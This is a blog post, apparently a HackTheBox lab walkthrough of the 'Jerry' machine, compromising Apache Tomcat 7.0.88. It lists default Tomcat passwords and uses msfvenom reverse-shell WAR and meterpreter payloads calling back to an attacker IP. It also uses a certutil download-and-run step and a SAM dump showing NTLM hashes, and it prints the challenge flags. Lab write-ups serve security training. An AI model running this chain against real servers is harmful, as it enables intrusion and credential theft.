VM - Jerry

Details: Written by NX; Category: Articles; Published: 02 May 2021; Hits: 613

HTB
Pentest

Walkthrough of HackTheBox VM "Jerry".

So, as usual we're kicking of with NMAP.

nmap -A -T4 -p- 10.129.125.234

Nmap scan report for 10.129.125.234
Host is up (0.034s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

So, we got Apache Tomcat 7.0.88. Let's look at Google, CVE, and maybe some default creds for Tomcat.

Apache Tomcat 7.0.88 CVE

https://www.cvedetails.com/cve/CVE-2019-0232/
https://www.cvedetails.com/cve/CVE-2019-0221/
https://www.cvedetails.com/cve/CVE-2018-11784/
https://www.cvedetails.com/cve/CVE-2018-8034/
https://www.cvedetails.com/cve/CVE-2018-8014/

Exploits

https://www.rapid7.com/db/modules/exploit/windows/http/tomcat_cgi_cmdlineargs/

Default creds for Tomcat

https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown

Username	Password
admin	password
admin
admin	Password1
admin	password1
admin	admin
admin	tomcat
both	tomcat
manager	manager
role1	role1
role1	tomcat
role	changethis
root	Password1
root	changethis
root	password
root	password1
root	r00t
root	root
root	toor
tomcat	tomcat
tomcat	s3cret
tomcat	password1
tomcat	password
tomcat
tomcat	admin
tomcat	changethis

Try to log in to the Tomcat manager, and you'll find out that admin/admin and tomcat/s3cret works, so now we can log into the server and study it. You will find we can deploy apps on it, in the war format. Hmm..maybe a shell ? msfvenom to the rescue, time to play.

msfvenom -p java/shell_reverse_tcp lhost=10.10.14.33 lport=4321 -f war -o pwn.war

Now, we need a listener to catch that shell, so fire up netcat.

nc -lvnp 4321
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4321
Ncat: Listening on 0.0.0.0:4321
Ncat: Connection from 10.129.125.234.
Ncat: Connection from 10.129.125.234:49192.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

We got a shell, and it's running as system. Now, let's build on that, and get a meterpreter shell.

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.33 LPORT=5555 -f exe > sh.exe

Now, we need a listener for meterpreter to connect back to, let's do that right now. Start up msfconsole, and setup the listener

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.33
msf6 exploit(multi/handler) > set LHOST 10.10.14.33
LHOST => 10.10.14.33
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > run

Okay, now we have a listener for meterpret running, so we have to switch our attention to the windows server for a moment. We need to copy our sh.exe to the server and exeute it, so we get meterpreter back, but how do we do that since we only have a normal shell ?. The idea is using python on our attacker maschine to host a webserver, and using certutil on the server to copy sh.exe over. Jump into the folder where sh.exe is, and launch python.

└─# python3 -m http.server 8080         
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

And on the server, in our limited shell, let's get our meterpreter payload and run it.

certutil -urlcache -f http://10.10:8080/sh.exe 
****  Online  ****

c:\Users\Administrator\Desktop\flags>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of c:\Users\Administrator\Desktop\flags

04/26/2021  10:51 PM    <DIR>          .
04/26/2021  10:51 PM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
04/26/2021  10:51 PM           206,848 sh.exe
               2 File(s)        206,936 bytes
               2 Dir(s)  27,599,491,072 bytes free
# RUN IT 

sh.exe

*] Started reverse TCP handler on 10.10.14.33:5555 
[*] Meterpreter session 1 opened (10.10.14.33:5555 -> 10.129.125.234:49199) at 2021-04-26 14:53:06 +0200

meterpreter > show sessions
[-] Unknown command: show.
meterpreter > sysinfo
Computer        : JERRY
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : HTB
Logged On Users : 0
Meterpreter     : x64/windows
meterpreter > 

meterpreter > lsa_dump_sam
[+] Running as SYSTEM
[*] Dumping SAM
Domain : JERRY
SysKey : 777873202c520da6e5ce6f10e419892b
Local SID : S-1-5-21-2323042369-1334567395-6350930

SAMKey : f9949362f1f1bada77d23e7d6370d3d6

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: fe34b627386c89a49eb254f6a267e4d9

RID  : 000001f5 (501)
User : Guest

So, we're done. Let's find some flags.

c:\Users\Administrator\Desktop\flags>type "2 for the price of 1".txt
type "2 for the price of 1".txt
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e
c:\Users\Administrator\Desktop\flags>

You have no rights to post comments

JComments

Search

Popular Tags

Latest Articles

Login Form

VM - Jerry

EU e-Privacy Directive